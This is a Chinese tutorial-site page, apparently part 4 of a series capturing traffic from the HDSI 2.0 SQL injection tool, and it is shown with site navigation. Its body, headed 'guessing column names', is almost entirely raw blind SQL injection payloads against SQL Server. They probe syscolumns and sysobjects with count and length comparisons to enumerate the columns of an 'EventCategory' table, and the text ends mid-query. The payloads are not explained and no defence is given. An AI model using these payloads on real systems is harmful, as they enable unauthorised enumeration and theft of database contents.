当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > hdsi2.0 sql注入部分抓包(4)

安全防护
网管员在日志分析中的五个误区
巧妙的化解分布式拒绝服务攻击
几种分布式攻击的防范(1)
几种分布式攻击的防范(2)
几种分布式攻击的防范(3)
警惕!Windows中各种不老实的服务
九大措施安全配置SQLServer2000
利用instr()函数防止SQL注入攻击
Web环境下SQL注入攻击的检测与防御
ASP注入漏洞全接触(1)
ASP注入漏洞全接触(2)
ASP注入漏洞全接触(3)
ASP注入漏洞全接触(4)
ASP注入漏洞全接触(5)
ASP注入漏洞全接触(6)
ASP注入漏洞全接触(7)
如何判断是否遭到流量攻击
Windows 2000安全实战
网站被入侵后需做的检测(1)
网站被入侵后需做的检测(2)

安全防护 中的 hdsi2.0 sql注入部分抓包(4)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 48 ::
收藏到网摘: n/a

猜解列名:

GET

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<48
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<56
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<60
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<62
and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where
A.id=B.id and

B.name='EventCategory' order by A.name desc) T order by name asc )<35